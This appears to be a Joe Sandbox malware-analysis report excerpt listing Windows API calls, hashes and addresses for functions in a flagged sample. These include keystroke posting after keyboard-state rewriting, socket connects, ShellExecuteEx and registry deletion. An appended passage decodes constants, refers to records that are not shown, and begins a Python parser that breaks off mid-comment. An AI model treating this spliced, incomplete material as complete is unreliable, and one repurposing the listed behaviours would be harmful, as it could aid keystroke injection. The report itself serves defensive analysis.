                                • Part of subcall function 008A0FF6: std::exception::exception.LIBCMT ref: 008A102C
                                • Part of subcall function 008A0FF6: __CxxThrowException@8.LIBCMT ref: 008A1041
                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008E73B6
                              • EnterCriticalSection.KERNEL32(?), ref: 008E73D2
                              • _memmove.LIBCMT ref: 008E7420
                              • _memmove.LIBCMT ref: 008E743D
                              • LeaveCriticalSection.KERNEL32(?), ref: 008E744C
                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008E7461
                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 008E7480
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                              • String ID:
                              • API String ID: 256516436-0
                              • Opcode ID: 988d8a9454a764983390ac91c8df79e274f6ab0be1e8514c1ba22178c742343b
                              • Instruction ID: 9b33ca9e90b86da2dca5429b30fd32dcaab73e18acaa633d3e1fa26bdc3bd638
                              • Opcode Fuzzy Hash: 988d8a9454a764983390ac91c8df79e274f6ab0be1e8514c1ba22178c742343b
                              • Instruction Fuzzy Hash: A9319E35908205EFDF10EF69DC85AAE7BB8FF45710F1440A5F904EB286DB709A10DBA1
                              APIs
                              • DeleteObject.GDI32(00000000), ref: 0090645A
                              • GetDC.USER32(00000000), ref: 00906462
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0090646D
                              • ReleaseDC.USER32(00000000,00000000), ref: 00906479
                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009064B5
                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009064C6
                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00909299,?,?,000000FF,00000000,?,000000FF,?), ref: 00906500
                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00906520
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                              • String ID:
                              • API String ID: 3864802216-0
                              • Opcode ID: 15ea53a85a3be54a4a7b44a7b8d61d5a435a04d21e44c8c3008c64f66430e6bc
                              • Instruction ID: 6e659f3285ebf0d82216aa053d38e5e15433843f4a85c91547ff7eedc4a7084e
                              • Opcode Fuzzy Hash: 15ea53a85a3be54a4a7b44a7b8d61d5a435a04d21e44c8c3008c64f66430e6bc
                              • Instruction Fuzzy Hash: 6A318D72214214BFEF208F10CC4AFEA3FADEF0A765F044065FE089A191C7759951CB60
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memcmp
                              • String ID:
                              • API String ID: 2931989736-0
                              • Opcode ID: e6f5592e65a6500b1fbf310a70ec024746f8f8c28d9d2f65e428a0db94a2c62d
                              • Instruction ID: 9929096bfbd8d22e19f4b3fbeca64e77befc67e5255d4ca2028cede652ffd511
                              • Opcode Fuzzy Hash: e6f5592e65a6500b1fbf310a70ec024746f8f8c28d9d2f65e428a0db94a2c62d
                              • Instruction Fuzzy Hash: 6721077174061BB7EA10B6249D46FAB339CFF61398F080122FE05D6782EB11DD21C2E6
                              APIs
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                • Part of subcall function 0089FEC6: _wcscpy.LIBCMT ref: 0089FEE9
                              • _wcstok.LIBCMT ref: 008EEEFF
                              • _wcscpy.LIBCMT ref: 008EEF8E
                              • _memset.LIBCMT ref: 008EEFC1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                              • String ID: X
                              • API String ID: 774024439-3081909835
                              • Opcode ID: 08228814147aaf3d56637c7a411b36a424bbfe681d63e4630ff467d07137692c
                              • Instruction ID: d2dad40cf607b7775adbe63807318475bbd9c6ce636a99110615d909349183f1
                              • Opcode Fuzzy Hash: 08228814147aaf3d56637c7a411b36a424bbfe681d63e4630ff467d07137692c
                              • Instruction Fuzzy Hash: 63C137315087409FD724EF28C881A6AB7E4FF85314F14496DF999DB2A2DB70ED45CB82
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8efd0b2531ac7e32160b8d979c5f3fcf41fb807617801d7a7fdd69bafbdb4c11
                              • Instruction ID: 16bf42286dad2bdf9c0d66e4b240cbd7d44965dfb6168a2601e0519f009de0e8
                              • Opcode Fuzzy Hash: 8efd0b2531ac7e32160b8d979c5f3fcf41fb807617801d7a7fdd69bafbdb4c11
                              • Instruction Fuzzy Hash: 69717A30904109EFCF14EF98CC89ABEBB79FF85314F148159F915EA251DB34AA52CBA4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e6a2f49b75b4995c3c8541f4c83bd8f255cde30738fef047655c53efce2a0d5e
                              • Instruction ID: 7492afa910da044d874936e59c16e03916feb4d6f1c63004dcaa78ee5eba4168
                              • Opcode Fuzzy Hash: e6a2f49b75b4995c3c8541f4c83bd8f255cde30738fef047655c53efce2a0d5e
                              • Instruction Fuzzy Hash: 9661AC72108704ABD710EB28CC85E6BB7E9FF84714F544A19F646D7292DB70AD04CB92
                              APIs
                              • IsWindow.USER32(01165BC0), ref: 0090B6A5
                              • IsWindowEnabled.USER32(01165BC0), ref: 0090B6B1
                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0090B795
                              • SendMessageW.USER32(01165BC0,000000B0,?,?), ref: 0090B7CC
                              • IsDlgButtonChecked.USER32(?,?), ref: 0090B809
                              • GetWindowLongW.USER32(01165BC0,000000EC), ref: 0090B82B
                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0090B843
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                              • String ID:
                              • API String ID: 4072528602-0
                              • Opcode ID: 8d95afd3983e4ee0ba9a46d41a775c2b94ebbd089a68db2dac3e660fcdf7a91f
                              • Instruction ID: c0877fd123610631f38fa2c5aec147bf9ae9aff9ea9796bff97f9c89c3c6d43d
                              • Opcode Fuzzy Hash: 8d95afd3983e4ee0ba9a46d41a775c2b94ebbd089a68db2dac3e660fcdf7a91f
                              • Instruction Fuzzy Hash: CE719A75604304AFDB209F64C8A4FAABBFDFF8A310F144469E946973E1C732A981DB51
                              APIs
                              • _memset.LIBCMT ref: 008FF75C
                              • _memset.LIBCMT ref: 008FF825
                              • ShellExecuteExW.SHELL32(?), ref: 008FF86A
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                • Part of subcall function 0089FEC6: _wcscpy.LIBCMT ref: 0089FEE9
                              • GetProcessId.KERNEL32(00000000), ref: 008FF8E1
                              • CloseHandle.KERNEL32(00000000), ref: 008FF910
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                              • String ID: @
                              • API String ID: 3522835683-2766056989
                              • Opcode ID: 303ef85fbec9806270c1dcf155883ff5dcea9fcb43f4add04630470fdb42fc23
                              • Instruction ID: 2f41508400bfdd31c317bb17234e144bbe49acbf62fcacc51171e7a22db83769
                              • Opcode Fuzzy Hash: 303ef85fbec9806270c1dcf155883ff5dcea9fcb43f4add04630470fdb42fc23
                              • Instruction Fuzzy Hash: FE618D75A00619DFCF14EF68C9849AEBBF5FF48310B148469E956EB352CB30AD41CB91
                              APIs
                              • GetParent.USER32(?), ref: 008E149C
                              • GetKeyboardState.USER32(?), ref: 008E14B1
                              • SetKeyboardState.USER32(?), ref: 008E1512
                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 008E1540
                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 008E155F
                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 008E15A5
                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008E15C8
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$Parent
                              • String ID:
                              • API String ID: 87235514-0
                              • Opcode ID: f8179aff22a19a73c4d77206caba15ab5ae20d02e906c8b02b2bfdfae85912cf
                              • Instruction ID: cfed01f45b64007e617a8503e344aa8ae53ab6b57aa6770c412ef0fc7318cf0b
                              • Opcode Fuzzy Hash: f8179aff22a19a73c4d77206caba15ab5ae20d02e906c8b02b2bfdfae85912cf
                              • Instruction Fuzzy Hash: F451E2B06087D53EFF32422A8C49BBABEAABB47304F084489E1D6C58D2C7A4DC84D751
                              APIs
                              • GetParent.USER32(00000000), ref: 008E12B5
                              • GetKeyboardState.USER32(?), ref: 008E12CA
                              • SetKeyboardState.USER32(?), ref: 008E132B
                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008E1357
                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 008E1374
                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008E13B8
                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008E13D9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$Parent
                              • String ID:
                              • API String ID: 87235514-0
                              • Opcode ID: 7c15f587591ba55324bf351d6740790dd74c909807f94138e8d50ea909227f6f
                              • Instruction ID: 28b320c564a4ed642ae5dda84621dd1ef513401b6c04f2f6a7e13b7fe46de27f
                              • Opcode Fuzzy Hash: 7c15f587591ba55324bf351d6740790dd74c909807f94138e8d50ea909227f6f
                              • Instruction Fuzzy Hash: 1051E4B05086D53DFF3282268C59BBA7EA9FB07304F084589E1D4C6DC2D7A9EC84D751
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _wcsncpy$LocalTime
                              • String ID:
                              • API String ID: 2945705084-0
                              • Opcode ID: d575a9911f39b6eeec5fe63e3b797376eb9fbf131fcb7fd11a57a586b858b943
                              • Instruction ID: 5c8281eb5dff063bd809272249b42fa031c4057b01f818ea7eb533ee5628f9cb
                              • Opcode Fuzzy Hash: d575a9911f39b6eeec5fe63e3b797376eb9fbf131fcb7fd11a57a586b858b943
                              • Instruction Fuzzy Hash: 1F41B4A5C2012876DB10FBB988869CF77A8FF06710F509462F918E3522F634D755C7A6
                              APIs
                                • Part of subcall function 008E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008E38D3,?), ref: 008E48C7
                                • Part of subcall function 008E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008E38D3,?), ref: 008E48E0
                              • lstrcmpiW.KERNEL32(?,?), ref: 008E38F3
                              • _wcscmp.LIBCMT ref: 008E390F
                              • MoveFileW.KERNEL32(?,?), ref: 008E3927
                              • _wcscat.LIBCMT ref: 008E396F
                              • SHFileOperationW.SHELL32(?), ref: 008E39DB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                              • String ID: \*.*
                              • API String ID: 1377345388-1173974218
                              • Opcode ID: 64f95b0a00c10a90708f8d8c5c6be68cbdb1a8eca7cfd807c5ed2f8514ed87ca
                              • Instruction ID: 5208bdda6515b1dc5811123a4be52c2447de8cfb0c081590a13859fed7791d55
                              • Opcode Fuzzy Hash: 64f95b0a00c10a90708f8d8c5c6be68cbdb1a8eca7cfd807c5ed2f8514ed87ca
                              • Instruction Fuzzy Hash: 05416DB24083849EC761EF69C4859DBB7E8FF8A340F10192EB499C3152EB75D688C752
                              APIs
                              • _memset.LIBCMT ref: 00907519
                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009075C0
                              • IsMenu.USER32(?), ref: 009075D8
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00907620
                              • DrawMenuBar.USER32 ref: 00907633
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Menu$Item$DrawInfoInsert_memset
                              • String ID: 0
                              • API String ID: 3866635326-4108050209
                              • Opcode ID: 9c795faf01cc081a67f2cd83e553c50bcfb41660cdfdb600bd68354777c83e55
                              • Instruction ID: 9875ea033959298d9b67beb23a953e0030f25bee339c8ae95f1a717de6d20763
                              • Opcode Fuzzy Hash: 9c795faf01cc081a67f2cd83e553c50bcfb41660cdfdb600bd68354777c83e55
                              • Instruction Fuzzy Hash: 27414A75A04608EFDB20DF94D884EAABBF8FF05324F048029F91697290D731AD50DFA1
                              APIs
                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0090125C
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00901286
                              • FreeLibrary.KERNEL32(00000000), ref: 0090133D
                                • Part of subcall function 0090122D: RegCloseKey.ADVAPI32(?), ref: 009012A3
                                • Part of subcall function 0090122D: FreeLibrary.KERNEL32(?), ref: 009012F5
                                • Part of subcall function 0090122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00901318
                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 009012E0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                              • String ID:
                              • API String ID: 395352322-0
                              • Opcode ID: 446a3ada143294340012bd2efac537eb9143a17aec924a8ce61e1d02981ad47a
                              • Instruction ID: 974a86a28d34efed373078a8cfbc8363af2e0110577dc1a775173a81794479b6
                              • Opcode Fuzzy Hash: 446a3ada143294340012bd2efac537eb9143a17aec924a8ce61e1d02981ad47a
                              • Instruction Fuzzy Hash: 25315CB1915109BFEB14DB94DC99EFFB7BCEF09300F000169E511E2581EB749F859AA0
                              APIs
                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0090655B
                              • GetWindowLongW.USER32(01165BC0,000000F0), ref: 0090658E
                              • GetWindowLongW.USER32(01165BC0,000000F0), ref: 009065C3
                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009065F5
                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0090661F
                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00906630
                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0090664A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: LongWindow$MessageSend
                              • String ID:
                              • API String ID: 2178440468-0
                              • Opcode ID: 48dd40e5bf1aca74760e9e04eb9665c84c2ce698189aac5c201e298db64a5e14
                              • Instruction ID: 775483ca1ec33792bdb35bd4a16708bdbb2227d47894767d9bf491e271b6e2dc
                              • Opcode Fuzzy Hash: 48dd40e5bf1aca74760e9e04eb9665c84c2ce698189aac5c201e298db64a5e14
                              • Instruction Fuzzy Hash: 28310075618214AFDB208F28DC89F553BE9FB4A714F1801A8F501CB2F6CB62A960EB41
                              APIs
                                • Part of subcall function 008F80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008F80CB
                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008F64D9
                              • WSAGetLastError.WSOCK32(00000000), ref: 008F64E8
                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 008F6521
                              • connect.WSOCK32(00000000,?,00000010), ref: 008F652A
                              • WSAGetLastError.WSOCK32 ref: 008F6534
                              • closesocket.WSOCK32(00000000), ref: 008F655D
                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 008F6576
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                              • String ID:
                              • API String ID: 910771015-0
                              • Opcode ID: e5e6fb5ecbdfc7e6e57f8488929e25e236d5c8984a3e9a13defaf33edfbf8f0a
                              • Instruction ID: 5ad11d4f11b1ebc1bb410c65989054c78dc85cd50bb929b8bd629fac64a5a4ce
                              • Opcode Fuzzy Hash: e5e6fb5ecbdfc7e6e57f8488929e25e236d5c8984a3e9a13defaf33edfbf8f0a
                              • Instruction Fuzzy Hash: 8A31B33160011CAFDB10AF64CC85BBE7BA9FB44714F048169FE46E7291EB70AD14DBA2
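The records above list each function's imports as `API.MODULE(args), ref: address` with raw hexadecimal arguments, so the reader has to decode the constants by hand. In the GetKeyboardState/SetKeyboardState record the PostMessageW message codes 0x100 and 0x101 are WM_KEYDOWN and WM_KEYUP, and the third argument 0x10, 0x11, 0x12 and 0x5B is VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN, i.e. modifier keys are posted to the target window after the keyboard state has been rewritten. In the WSOCK32 record the value 0x8004667E passed to ioctlsocket is FIONBIO, so the socket is switched to non-blocking mode before connect and WSAGetLastError is consulted for the pending-connect status. In the combase.dll records further down, 0x800 passed to LoadLibraryExW is LOAD_LIBRARY_SEARCH_SYSTEM32, which limits the search to the System32 directory and so keeps that load out of reach of application-directory DLL planting. The following Python script is an added example and is not part of the Joe Sandbox report: it parses lines in this record format, decodes those constants, and names the two call sequences. The sample lines are copied from this page; the constant tables, the pattern names and the function names are the example's own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Constructed sample: "APIs" lines in the Joe Sandbox per-function format,
# copied from this report (two records plus one LoadLibraryExW line).
SAMPLE_APIS = """\
• GetParent.USER32(00000000), ref: 008E12B5
• GetKeyboardState.USER32(?), ref: 008E12CA
• SetKeyboardState.USER32(?), ref: 008E132B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008E1357
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 008E1374
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008E13B8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008E13D9
  • Part of subcall function 008F80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008F80CB
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008F64D9
• ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 008F6521
• connect.WSOCK32(00000000,?,00000010), ref: 008F652A
• DrawMenuBar.USER32 ref: 00907633
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,008A4292,?), ref: 008A41E3
"""

# One record line: optional "Part of subcall function X:" prefix, API.MODULE,
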